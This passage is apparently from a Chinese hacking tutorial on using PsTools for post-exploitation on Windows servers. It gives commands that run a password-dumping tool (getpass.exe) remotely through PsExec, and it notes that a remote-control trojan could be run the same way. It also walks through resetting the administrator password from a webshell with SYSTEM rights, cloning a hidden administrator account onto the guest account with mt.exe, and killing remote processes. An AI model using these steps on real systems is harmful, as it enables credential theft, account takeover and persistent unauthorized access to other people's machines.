经过测试,比guest权限大的用户组都可以远程登陆。
IIS_WPG用户组的无法远程连接,但是你不用担心,一般属于IIS_WPG用户组的用户一般也属于guest用户组。
有关用户组相关的介绍请围观法客周年庆之提权专题 下载地址: http://www.2cto.com/ebook/201211/35554.html
获取cmdshell的介绍就到这里。一旦获得一个cmdshell后面的渗透将会比较轻松。 经过测试,用最新版的pstools,windows2008 win7 都能连接成功,win8由于没有win8系统,就未测试,应该是能行的,毕竟这是微软的管理工具。
Win7连接示意图:
程序上传并执行
首先现在在本地配置一个将上传到服务器上运行的程序到H盘根目录。这里用抓取系统密码的神器getpass来演示。H:\\getpass.exe
程序上传并执行命令如下:
Psexec \\\\192.169.1.3 –u test –p 12345 –c H:\\getpass.exe –d 最后一个-d的参数可有可无~~~
只是怕程序远程运行后会卡住而无法返回信息。 测试如图:
当然你也可运行一个远控木马这些都可以~~~ Psexec 的介绍就到这里了。 pspasswd的应用详解
Pspasswd是一个用来更改用户密码的工具,支持远程密码修改和本地密码修改。这款工具的特点就是不依靠net,exe程序进行密码修改。
本地修改命令如下:
pspasswd administrator yueyan 演示图如下:
远程命令如下:
pspasswd \\\\192.168.1.3 –u administrator –p 123456 guest yueyan
命令的意思就是,用administrator这个管理员账户登录后修改用户guest的密码为yueyan
相对来说本地修改密码的功能更强大一些。 我这将介绍个实例:
我的一个好基友Lynn得到一个jsp马,并且是nt authority\\system权限。但是无法添加用户,且无法用net修改管理员密码。抓取hash密码大于14位,LMhash无效,本地又为搭建彩虹表,网上破解无果。Hash传递登陆被拦截。但是机油lynn却一直想用administrator这个用户登陆进去,当然方法还有很多,比如: mimikatz.exe抓取明文密码等,这里我将介绍pspasswd的妙用。
我们想用administrator这个账户登陆进去。很简单,直接上传一个pspasswd上服务器。
执行下面的命令:
首先执行D:\\web|pspasswd.exe –accepteula (第一次执行,表示许可执行的意思) D:\\web|pspasswd.exe administrator yueyan 就会成功修改administrator的密码。
这里能修改密码的原因是pspasswd不是调用net.exe进行密码修改。 上述介绍常常配合mt.exe进行用户克隆。这里简单介绍: (关于mt.exe的详细介绍请访问:【工具】mt.exe的详细介绍) 首先mt.exe查看用户sid,比较后看是否有克隆账户 Mt -chkuser
比较后,没有克隆账户,我们选择guest这个账户进行克隆: Mt –clone administrator guest 然后配合pspasswd修改密码: Pspasswd guest yueyan
就这样成功克隆一个账户,并能成功登陆访问。
Pspasswd的功能就介绍到这里。 pskill+psinfo+pslist的应用详解 首先是介绍pskill.
如果你想远程结束远程主机上的一个进程,你可以使用pskill。 我们就介绍一下常用的命令:
比如我们想远程关闭远程主机正在运行的cmd这个进程,可以用pskill进行杀掉。命令如下:
pskill \\\\192.168.1.3 –u test –p 123456 cmd.exe 命令很简单~~~~